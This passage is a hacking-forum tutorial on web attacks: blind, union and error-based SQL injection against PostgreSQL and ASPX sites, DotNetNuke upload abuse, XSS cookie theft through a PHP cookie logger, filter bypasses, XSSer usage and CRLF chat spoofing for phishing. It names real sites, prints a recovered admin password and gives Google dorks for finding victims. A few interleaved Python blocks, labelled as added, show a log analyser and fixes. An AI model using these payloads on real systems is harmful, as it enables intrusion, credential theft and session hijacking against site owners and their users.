After --string we put something that lets sqlmap recognize that it found a letter (some part of the text that disappears when the condition is false).
-e is the SQL statement we want to execute. In our case this one:
Code:
SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where userid=1
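A defender-side counterpart to the hand-driven and sqlmap-driven extraction above, added here and not part of the tutorial: a small access-log analyser that flags the probe shapes these sections use (the tautology, the @@version guess, the per-table select probe, the ascii(substring()) loop and sqlmap's User-Agent). The log lines, IPs and user agents are constructed for this example.

```python
"""
Added example, not part of the tutorial: flag the blind SQL injection
probe shapes used above (and 1=2, substring(@@version,...), per-table
select probes, ascii(substring(...)) extraction, sqlmap's User-Agent)
in web-server access logs. The log lines and IPs are constructed.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample log, Apache combined format.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Apr/2012:10:29:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Apr/2012:10:29:02 +0000] "GET /index.php?id=1+and+1=2 HTTP/1.1" 200 3980 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Apr/2012:10:29:03 +0000] "GET /index.php?id=1+and+substring(@@version,1,1)=4 HTTP/1.1" 200 3980 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Apr/2012:10:29:04 +0000] "GET /index.php?id=1+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Apr/2012:10:29:05 +0000] "GET /index.php?id=1+and+(select+1+from+admin+limit+0,1)=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Apr/2012:10:29:06 +0000] "GET /index.php?id=1+and+ascii(substring((select+concat(username)+from+admin+limit+0,1),1,1))>64 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Apr/2012:10:30:00 +0000] "GET /index.php?id=7 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Apr/2012:10:30:09 +0000] "GET /index.php?id=1%20AND%201%3D1 HTTP/1.1" 200 5123 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each rule is applied to the URL-decoded, lower-cased query string.
PROBE_RULES = [
    ("boolean_tautology", re.compile(r"\band\s+\d+\s*=\s*\d+")),
    ("version_fingerprint", re.compile(r"substring\s*\(\s*@@version")),
    ("table_probe", re.compile(r"\(\s*select\s+1\s+from\s+\w+\s+limit")),
    ("char_by_char_extraction", re.compile(r"ascii\s*\(\s*substring\s*\(")),
]
SQLMAP_UA = re.compile(r"sqlmap", re.IGNORECASE)


def parse_line(line):
    """Split one combined-format line into its fields, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of rule names one parsed log entry triggers."""
    hits = []
    query = unquote_plus(entry["url"].partition("?")[2]).lower()
    for name, pattern in PROBE_RULES:
        if pattern.search(query):
            hits.append(name)
    if SQLMAP_UA.search(entry["ua"]):
        hits.append("sqlmap_user_agent")
    return hits


def analyze(log_text):
    """
    Map each client IP to the set of rules it triggered and the number of
    matching requests, so the sequence of a blind extraction (tautology ->
    version -> table guess -> per-character loop) shows up as one actor
    rather than as isolated hits.
    """
    report = {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if not hits:
            continue
        rec = report.setdefault(entry["ip"], {"rules": set(), "requests": 0})
        rec["rules"].update(hits)
        rec["requests"] += 1
    return report


if __name__ == "__main__":
    for ip, rec in analyze(SAMPLE_LOG).items():
        print(ip, rec["requests"], sorted(rec["rules"]))
```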
PostgreSQL Injection :
1) PostgreSQL Injection?
PostgreSQL Injection is almost the same as SQL Injection. The difference is that the database is PostgreSQL, not MySQL. It is a slightly more complicated attack than the usual SQL Injection, and there are some other functions that we will use, as you will see.
2) Finding vulnerable sites
Finding vulnerable sites is the same as for usual SQL Injection, which means we can use Google dorks.
Here are some:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=
3) Site vulnerability check
You found a site that may be vulnerable. To check whether it is vulnerable we add ' at the end of the link:
Code:
http://www.link.com/page.php?page=1'
If on the page we get:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near
or some part of the page disappears, the site is vulnerable.
4) Finding number of columns
So we know the site is vulnerable; now we need to find the number of columns. This time we do it with union.
Our link:
Code:
http://www.link.com/page.php?page=1+union+select+all+null--+-
If the page loads normally it means there are more columns.
Code:
http://www.link.com/page.php?page=1+union+select+all+null,null,null,null--+-
We keep adding null until we get an error. If we get an error with 7 nulls, it means we have 6 columns, i.e. 6 nulls.
5) Finding vulnerable columns
Finding the vulnerable column is easy. Null = 0, so we replace one null at a time with something; if nothing shows up, that column is not usable. That is how we find the vulnerable column.
So:
Code:
http://www.link.com/page.php?page=1+union+select+all+current_database(),null,null,null--+-
If nothing is listed, the column is not usable; we move on to the next one and set this one back to null.
6) Finding database version
We do this with the version() function.
This link will show us the version:
Code:
http://www.link.com/page.php?page=1+union+select+all+version(),null,null,null--+-
We will get something like:
Code:
PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit
7) Finding table name
Same as usual SQL Injection; the only difference is that instead of column numbers we have null.
So it should look like:
Code:
http://www.link.com/page.php?page=1+union+select+all+table_name,null,null,null+from+information_schema.tables--+-
We will get the table names, and then the columns from the tables.
8) Finding column name
This is also easy, and there is no big difference.
This is how it should look:
Code:
http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,null+from+information_schema.columns+where+table_name='users'--+-
Sometimes this won't work because the quotes are filtered, so we build the string from its ASCII decimal codes with CHR() instead.
You can use this site:
Code:
http://easycalculation.com/ascii-hex.php
So we have the link:
Code:
http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,null+from+information_schema.columns+where+table_name=CHR(117)||CHR(115)||CHR(101)||CHR(114)||CHR(115)--+-
9) Taking data from columns
Also almost the same as usual SQL Injection:
Code:
http://www.link.com/page.php?page=1+union+select+all+username||CHR(58)||password+from+users--+-
Error based PostgreSQL Injection :
1) Error based PostgreSQL Injection?
Error based PostgreSQL Injection is a type of web attack related to a PostgreSQL database. The difference is that you can get all tables, columns, values from columns, etc. As the title says, the attack is based on errors, and all results are shown inside the error messages.
2) Finding vulnerable sites
Use Google dorks:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=
3) Site vulnerability check
Add ' at the end of the link:
Code:
http://www.link.com/page.php?page=1'
If we get:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near
the site is vulnerable.
4) Finding database version
Use the version() function. In this type of attack the query looks a bit more complicated than in usual SQL Injection, so don't get confused.
Code:
http://www.link.com/page.php?page=1+and+1=cast(version()+as+int)--
If the query runs, you get this on the page:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"
from which we get the database version:
Code:
PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit
5) Finding table name
As I said at the start, we cannot get all tables at once, so we use limit and offset.
offset says which result from the database we want to list.
Our link:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+information_schema.tables+limit+1+offset+0)+as+int)--
On the page we get this error:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "pg_type"
From this we have the table pg_type.
To get the next table we change the offset to 1:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+information_schema.tables+limit+1+offset+1)+as+int)--
and we get a table like pg_attribute.
6) Finding column name
The first thing to do is convert the table name into decimal ASCII codes.
We use:
Code:
http://easycalculation.com/ascii-hex.php
Type the string admin and you get the decimal codes:
Code:
97 100 109 105 110
We change this a bit, so it looks like this (the + signs are URL-encoded spaces):
Code:
CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)
Now we use it as the table name and get the columns:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+column_name+from+information_schema.columns+where+table_name=CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)+limit+1+offset+0)+as+int)--
and we get the column id. We keep changing the offset until the site sends us back to the home page, which means there are no more columns in that table.
7) Taking data from columns
We found the columns username and password and now we want to get the data from them:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+username+||CHR(58)||+password+from+admin+limit+1+offset+0)+as+int)--
and we get this:
Code:
admin:21232f297a57a5a743894a0e4a801fc3
CHR(58) is the colon (:), which we use to get two columns at the same time.
NOTE: (regarding the whole tutorial) from now on I'm not going to explain things in detail, because I think you should be able to figure it out by now. So I'm going to use only pictures and code.
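The two defects behind the union-based and error-based techniques above, next to the fixed version, as an added example in Python with an in-memory SQLite database (not the tutorial's PHP/PostgreSQL setup): the page parameter is pasted into the SQL string, and the driver's error text is echoed back to the visitor. The tables, rows and hash are constructed; SQLite's CAST does not raise on bad input, so the echoed-error path is shown with a syntax error instead.

```python
"""
Added example, not part of the tutorial: string-built query versus bound
parameter, and echoed driver error versus generic message. SQLite stands in
for the site's database; the rows below are constructed.
"""
import sqlite3


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE pages(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admin(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO pages VALUES (1, 'Home', 'Welcome');
        INSERT INTO admin VALUES (1, 'admin', '21232f297a57a5a743894a0e4a801fc3');
    """)
    return con


def lookup_vulnerable(con, page):
    """page.php?page=... as the tutorial assumes it: the parameter is pasted into SQL."""
    return con.execute("SELECT id, title, body FROM pages WHERE id=" + page).fetchall()


def lookup_safe(con, page):
    """Bound parameter plus type check: the input can only ever be an integer value."""
    try:
        page_id = int(page)
    except ValueError:
        return []
    return con.execute(
        "SELECT id, title, body FROM pages WHERE id=?", (page_id,)
    ).fetchall()


def render(con, page, safe):
    """
    Second defect: echoing the driver's error text. The cast()/convert()
    tricks above only work because the message, with the smuggled value
    in it, reaches the response. The fixed path returns a generic message
    (the detail belongs in the server log).
    """
    try:
        rows = lookup_safe(con, page) if safe else lookup_vulnerable(con, page)
    except sqlite3.Error as exc:
        if safe:
            return "An error occurred"
        return f"Query failed: {exc}"      # what the PHP warning leaks
    return rows


# The tutorial's union shape, with the row-separator trick from section 9).
UNION_PAYLOAD = "1 union select all id, username||':'||password, null from admin--"


if __name__ == "__main__":
    db = make_db()
    print(render(db, UNION_PAYLOAD, safe=False))
    print(render(db, UNION_PAYLOAD, safe=True))
```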
SQL Injection on ASPX :
1) Site vulnerability check
Vulnerable link:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton
We add order by 1--:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton order by 1--
If you get a page error go to:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535
2) Finding column name
Go to:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 having 1=1
3) Finding table name
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables))
We want the admin table, so we type next:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Tab_FinalOrder')))
The admin table name is AdminMaster.
4) Finding columns in admin table
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster'))
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster' and column_name not in ('Admin_name')))
Column names:
5) Finding username and password
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_name from AdminMaster))
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_password from AdminMaster))
Code:
Username: admin
Password: pothys!@#
Dot net nuke :
DNN has a gallery that you can upload to on the site and use to hold pictures, like an "online gallery". That gallery has a hole that lets you upload files to the site with the extensions *.gif, *.jpg, *.pdf, *.txt, *.swf...
Google dork to find vulnerable sites:
Code:
inurl:fck/fcklinkgallery.aspx
I'm going to use this site:
Code:
http://kellyballancephotography.com/providers/htmleditorproviders/fck/fcklinkgallery.aspx
If the page loads it will look like this:
which means that we can continue. Now we choose option 3 -> File (A File On Your Site) and type the javascript to upload a file:
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')
Choose File and the Upload Selected File button will show up.
*on this site the text color matches the background, so you have to select the whole page (CTRL+A) to see the upload button.
Upload the file and access it at sitelink.com/portals/0/filename.extension
->
Code:
http://kellyballancephotography.com/portals/0/config.txt
XSS :
1) XSS?
XSS lets an attacker execute Javascript code. XSS is short for Cross Site Scripting.
You can use XSS in many ways: for simply executing Javascript commands, or to steal cookies. We inject the stolen cookie so we can log in somewhere without a password.
2) Required stuff
Mozilla Firefox:
Code:
http://www.mozilla.org/en-US/products/download.html?product=firefox-3.0.5&os=win&lang=en-GB
Add-on Firebug:
Code:
https://addons.mozilla.org/en-US/firefox/addon/firebug/
Add-on FireCookie:
Code:
https://addons.mozilla.org/en-US/firefox/addon/firecookie/
Add-on Live HTTP Headers:
Code:
https://addons.mozilla.org/en-US/firefox/downloads/file/28118/live_http_headers-0.14-fx+sm.xpi
It is recommended to have basic knowledge of Javascript.
3) Testing XSS vulnerability
Sites on which we can use this method are sites with a text input and a submit button, and sites where you can use the GET method to print something.
e.g. with the GET method:
Code:
www.site.com/index.php?page=<script>alert("XSS")</script>
The command to check site vulnerability is:
Code:
<script>alert("XSS")</script>
Now I will explain what this command does:
<script> - opening script tag
alert("XSS") - a window will pop up saying "XSS"
</script> - closing script tag
4) XSS types
Cookie Stealing - we steal cookies from some user (commonly the admin) and put the cookie in our browser, so when we visit the site we are already logged in.
Cross-Site Request Forgery - we send some commands without knowing the username.
XSS Worms - an "evil" script that can spread over the whole site.
Door-Forwarding - the script creates an iframe which exploits something or starts downloading a virus, RAT, keylogger, istealer, etc.
Keylogging - you know what keylogging is.
5) Cookie Stealing
For cookie stealing we need:
-Vulnerable site
-Web host for the scripts
-php script
Put this script on some hosting:
cookie.php
Code:
<?php
// append the value of the "cookie" GET parameter to the log file
$cookie = $_GET["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n");
fclose($file);
?>
Script execution:
Code:
<script>document.location="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
or
<script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
or
<script>window.open('http://www.link.com/cookie.php?cookie=' + document.cookie)</script>
or
<script>window.location='http://www.link.com/cookie.php?cookie=' + document.cookie;</script>
How this works?
When some user logs on to the page that contains your cookie logger, his cookie is saved. Then we take the cookie and use it. Here is how we do it:
1) Open Mozilla
2) Open the Firebug add-on
3) Type the cookie name and value. Here is one:
Code:
PHPSESSID=db3e4e100ab6bb912de1b80c4eed7898
In this cookie the name is PHPSESSID
and the value is db3e4e100ab6bb912de1b80c4eed7898
6) Filter bypassing
1) Deleting script tag
e.g. if we type <script>alert("XSS")</script> and the page prints only alert("XSS"), the filter deletes the <script> and </script> tags.
Here is how to bypass that protection: instead of <script>alert("XSS")</script> we add
<scr<script>ipt>alert("XSS")</scr</script>ipt>
2) magic_quotes
Explained here:
Code:
http://en.wikipedia.org/wiki/Magic_quotes
If you type <script>alert("XSS")</script> and it prints <script>alert("XSS")</script> back as text, then it is magic_quotes protection.
It is a bit harder to bypass magic_quotes protection. It works with String.fromCharCode.
Here is an example:
The link of our cookie logger is http://link.com/cookie.php. We would turn
<script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
into:
Code:
<scr<script>ipt>location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,108,105,110,107,46,99,111,109,47,99,111,111,107,105,101,46,112,104,112,63,99,111,111,107,105,101,61)+document.cookie;</scr</script>ipt>
This is needed when your code contains ' or "; the integer codes themselves need no quotes.
Here http://www.link.com/cookie.php?cookie= was converted to decimal codes with this tool:
Code:
Ascii to Decimal
http://pookey.co.uk/binary.php
6) Bypass XSS Filters
[1] Types of filters :
[+]Bypass magic_quotes_gpc (if it's on )
[+]Bypass with cryption in full html
[+]Bypass with Obfuscation
[+]Bypass with trying around method
[+]Bypass magic_quotes_gpc
When magic_quotes_gpc is on, it means that the server doesn't allow ", / and ' (it depends).
To bypass it we use:
String.fromCharCode()
We write our code inside the () encoded as ASCII codes.
Example:
String.fromCharCode(107, 51, 110, 122, 48)
(Here I encoded k3nz0 in ASCII: 107, 51, 110, 122, 48)
And we use it:
<script>document.write(String.fromCharCode(107, 51, 110, 122, 48))</script>
We will see: k3nz0
We bypassed magic_quotes_gpc :)
[+] Bypass with cryption in full html :
Very simple, we have to encode our code in "full HTTP" (URL percent-encoding)!
Our code: <script>alert('i am here')</script>
And in full HTTP:
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%69%20%61%6D%20%68%65%72%65%27%29%3C%2F%73%63%72%69%70%74%3E
Now you can inject it :) !
Notice that you can use the tool "Coder" to encode it in full HTTP.
We bypassed the filter.
[+] Bypass with Obfuscation :
Very simple too: this filter doesn't allow, for example, these words:
-script
-alert
To bypass it, you change "script" to, for example, "sCriPt", and "alert" to "ALerT"!
For example:
<ScriPt>ALeRt("i am here")</scriPt>
We bypassed the filter.
[+] Bypass with trying around method :
Generally it is in search scripts; we just add "> at the beginning to close the current field. Example:
http://target.com/search.php?search="><script>alert("hello")</script>
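The defender's view of the cookie-stealing and filter-bypass sections above, as an added example that is not part of the tutorial: the two blacklist filters described there (strip the script tag, block the words "script"/"alert") re-implemented as small Python functions and run against the tutorial's own vectors, next to context-aware output encoding that holds against all of them. Everything is local string handling; nothing is sent anywhere.

```python
"""
Added example, not part of the tutorial: the blacklist filters the bypass
section defeats, next to output encoding, run against the tutorial's own
vectors. Everything is local string handling; nothing is sent anywhere.
"""
import html
import re
from urllib.parse import unquote

# Vectors quoted in the tutorial.
PLAIN = '<script>alert("XSS")</script>'
TAG_SPLIT = '<scr<script>ipt>alert("XSS")</scr</script>ipt>'
MIXED_CASE = '<ScriPt>ALeRt("i am here")</scriPt>'
URL_ENCODED = ('%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%69%20%61%6D'
               '%20%68%65%72%65%27%29%3C%2F%73%63%72%69%70%74%3E')
CLOSE_FIELD = '"><script>alert("hello")</script>'

SCRIPT_TAG = re.compile(r"</?script>")   # case-sensitive, applied once


def filter_delete_script_tag(s):
    """The 'deleting script tag' filter: remove <script> and </script>."""
    return SCRIPT_TAG.sub("", s)


def filter_blacklist_words(s):
    """The 'obfuscation' filter: reject input containing a few keywords."""
    return "" if ("script" in s or "alert" in s) else s


def browser_view(s):
    """What the application (and the browser) sees once the URL is decoded."""
    return unquote(s)


def renders_script(s):
    """True if the text still contains a live <script> start tag."""
    return re.search(r"<script\b", s, re.IGNORECASE) is not None


def encode_for_html(s):
    """Defender's fix: decode once, then escape for the HTML text/attribute context."""
    return html.escape(browser_view(s), quote=True)


def render_search_box(value):
    """The search form the 'trying around' vector targets, with the value escaped."""
    return f'<input type="text" name="search" value="{encode_for_html(value)}">'


if __name__ == "__main__":
    for name, vec in [("plain", PLAIN), ("split", TAG_SPLIT), ("case", MIXED_CASE),
                      ("urlenc", URL_ENCODED), ("close", CLOSE_FIELD)]:
        print(name,
              "strip:", renders_script(browser_view(filter_delete_script_tag(vec))),
              "words:", renders_script(browser_view(filter_blacklist_words(vec))),
              "escape:", renders_script(encode_for_html(vec)))
```

The point the bypass section makes in attacker terms shows up here as three filter failures (tag splitting, case, encoding) and zero failures for escaping, which is why encoding on output, not blacklisting on input, is the fix.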
7) XSSER Framework
Download : http://sourceforge.net/projects/xsser/
Usage
xsser [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final
Injection(s)]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-s, --statistics show advanced statistics output results
-v, --verbose verbose (default: no)
--gtk launch XSSer GTK Interface
*Special Features*:
You can choose Vector(s) and Bypasser(s) to inject code with this extra special features:
--imx=IMX create a false image with XSS code embedded
--fla=FLASH create a false .swf file with XSS code embedded
*Select Target(s)*:
At least one of these options has to be specified to set the source to get target(s) urls from.
You need to choose to run XSSer:
-u URL, --url=URL Enter target(s) to audit
-i READFILE Read target URLs from a file
-d DORK Process search engine dork results as target urls
--De=DORK_ENGINE
Search engine to use for dorking (bing, altavista,
yahoo, baidu, yandex, youdao, webcrawler,ask, etc.
See dork.py file to check for available engines)
*Select type of HTTP/HTTPS Connection(s)*:
These options can be used to specify which parameter(s) we want to use like payload to inject code.
-g GETDATA Enter payload to audit using GET. (ex: '/menu.php?q=')
-p POSTDATA Enter payload to audit using POST. (ex: 'foo=1&bar=')
-c CRAWLING Number of urls to crawl on target(s): 1-99999
--Cw=CRAWLING_WIDTH Deeping level of crawler: 1-5
--Cl Crawl only local target(s) urls (default TRUE)
*Configure Request(s)*:
These options can be used to specify how to connect to target(s) payload(s).
You can select multiple:
--cookie=COOKIE Change your HTTP Cookie header
--user-agent=AGENT Change your HTTP User-Agent header (default SPOOFED)
--referer=REFERER Use another HTTP Referer header (default NONE)
--headers=HEADERS Extra HTTP headers newline separated
--auth-type=ATYPE HTTP Authentication type (value Basic or Digest)
--auth-cred=ACRED HTTP Authentication credentials (value name:password)
--proxy=PROXY Use proxy server (tor: http://localhost:8118)
--timeout=TIMEOUT Select your Timeout (default 30)
--delay=DELAY Delay in seconds between each HTTP request (default 8)
--threads=THREADS Maximum number of concurrent HTTP requests (default 5)
--retries=RETRIES Retries when the connection timeouts (default 3)
*Select Vector(s)*:
These options can be used to specify a XSS vector source code to inject in each payload.
Important, if you don't want to try to inject a common XSS vector, used by default.
Choose only one option:
--payload=SCRIPT OWN - Insert your XSS construction -manually-
--auto AUTO - Insert XSSer 'reported' vectors from file
*Select Bypasser(s)*:
These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters on
target(s) code and some IPS rules, if the target use it.
Also, can be combined with other techniques to provide encoding:
--Str Use method String.FromCharCode()
--Une Use function Unescape()
--Mix Mix String.FromCharCode() and Unescape()
--Dec Use Decimal encoding
--Hex Use Hexadecimal encoding
--Hes Use Hexadecimal encoding, with semicolons
--Dwo Encode vectors IP addresses in DWORD
--Doo Encode vectors IP addresses in Octal
--Cem
Try -manually- different Character Encoding mutations
(reverse obfuscation: good) -> (ex:'Mix,Une,Str,Hex')
*Special Technique(s)*:
These options can be used to try to inject code using different type of XSS techniques. You can select
multiple:
--Coo COO - Cross Site Scripting Cookie injection
--Xsa XSA - Cross Site Agent Scripting
--Xsr XSR - Cross Site Referer Scripting
--Dcp DCP - Data Control Protocol injections
--Dom DOM - Use Anchor Stealth (DOM shadows!)
--Ind IND - HTTP Response Splitting Induced code
--Anchor ANC - Use Anchor Stealth payloader (DOM shadows!)
*Select Final injection(s)*:
These options can be used to specify the final code to inject in vulnerable target(s). Important, if you want
to exploit on-the-wild your discovered vulnerabilities.
Choose only one option:
--Fp=FINALPAYLOAD OWN - Insert your final code to inject -manually-
--Fr=FINALREMOTE REMOTE - Insert your final code to inject -remotelly-
--Doss DOSs - XSS Denial of service (server) injection
--Dos DOS - XSS Denial of service (client) injection
--B64 B64 - Base64 code encoding in META tag (rfc2397)
*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select
multiple and combine with your final code (except with DCP code):
--Onm ONM - Use onMouseMove() event to inject code
--Ifr IFR - Use "iframe" source tag to inject code
*Miscellaneous*:
--silent inhibit console output results
--update check for XSSer latest stable version
--save output all results directly to template (XSSlist.dat)
--xml=FILEXML output 'positives' to aXML file (--xml filename.xml)
--publish output 'positives' to Social Networks (identi.ca)
--short=SHORTURLS display -final code- shortered (tinyurl, is.gd)
--launch launch a browser at the end with each XSS discovered
Example :
* Simple injection from URL:
$ python xsser.py -u "http://host.com"
-------------------
* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:
$ python xsser.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666"
-------------------
* Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):
$ python xsser.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w
-------------------
* Multiple injections from URL, with automatic payloading, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):
$ python xsser.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
-------------------
* Advance injection from File, payloading your -own- payload and using Unescape() character encoding to bypass filters:
$ python xsser.py -i "urls.txt" --payload 'a="get";b="URL("";c="javascript:";d="alert('XSS');")";eval(a+b+c+d);' --Une
-------------------
* Injection from Dork selecting "duck" engine (XSSer Storm!):
$ python xsser.py --De "duck" -d "search.php?"
-------------------
* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):
$ python xsser.py -c3 --Cw=4 -u "http://host.com"
-------------------
* Simple injection from URL, using POST, with statistics results:
$ python xsser.py -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s
-------------------
* Multiple injections from URL to a parameter sending with GET, using automatic payloading, with IP Octal payloading ofuscation and printering results in a "tinyurl" shortered link (ready for share!):
$ python xsser.py -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl
-------------------
* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any "hole", applying your manual final payload "malicious" code (ready for real attacks!):
$ python xsser.py -u "http://host.com" -g "bs/?q=" --Coo --Dom --Fr="!enter your final injection code here!"
-------------------
* Simple injection from URL, using GET and trying to generate with results a "malicious" shortered link (is.gd) with a valid DoS (Denegation Of Service) browser client payload:
$ python xsser.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"
-------------------
* Multiple injections to multiple places, extracting targets from a list in a FILE, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between petitions to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and in Cookie parameters, using proxy Tor, with IP Octal ofuscation, with statistics results, in verbose mode and creating shortered links (tinyurl) of any valid injecting payloads found. (real playing mode!):
$ python xsser.py -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"
-------------------
* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to be uploaded.
$ python xsser.py --Imx "test.png" --payload "!enter your malicious injection code here!"
-------------------
* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.
$ python xsser.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"
-------------------
* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to http://identi.ca (federated XSS pentesting botnet)
$ python xsser.py -d "login.php" --De "duck" --publish
-------------------
* Create a .swf movie with XSS code injected
$ python xsser.py --fla "name_of_file"
-------------------
* Send a pre-checking hash to see if target will generate -false positive- results
$ python xsser.py -u "host.com" --hash
-------------------
* Multiple fuzzing injections from url, including DCP injections and exploiting our "own" code, spoofed in a shortered link, on positive results founded. XSS real-time exploiting.
$ python xsser.py -u "host.com" --auto --Dcp --Fp "enter_your_code_here" --short "is.gd"
-------------------
* Exploiting Base64 code encoding in META tag (rfc2397) in a manual payload of a vulnerable target.
$ python xsser.py -u "host.com" -g "vulnerable_path" --payload "valid_vector_injected" --B64
-------------------
* Exploiting our "own" -remote code- in a payload discovered using fuzzing and launch it in a browser directly
$ python xsser.py -u "host.com" -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch
CRLF :
1) CRLF?
Short for Carriage Return and Line Feed. CRLF is very easy to use. It is as if we are adding a new row (\n).
2) Vulnerable places
Vulnerable places can be anywhere. In this tutorial I'm going to use a chat.
3) Exploiting vulnerability and protection
Let's say you send this message; the chat will look like this:
Code:
1.4.2012 10:29 - fodex: Why login page is down?
1.4.2012 10:29 - saiR: Look like somebody deleted login database.
1.4.2012 10:29 - Admin: I'm gonna check this out and will announce you.
1.4.2012 10:30 - saiR: Ok go ahead...\n1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back: http://vulnerablesite.com/login.php
If the chat is vulnerable, it will look like this:
Code:
1.4.2012 10:30 - saiR: Ok go ahead...
1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back: http://vulnerablesite.com/login.php
We wrote the second message "from Admin" ourselves; users will think the Admin actually sent it and will log in to the site we gave them. That login page is where we keylog the site logins.
4) Vulnerable script
e.g.
Code:
<?php
if(isset($_POST['send_message']))
{
    if(!empty($_POST['message']))
    {
        // htmlspecialchars() escapes HTML characters but leaves CR and LF in place
        $message = htmlspecialchars($_POST['message']);
        // rest of the code to send the message
    }
}
?>
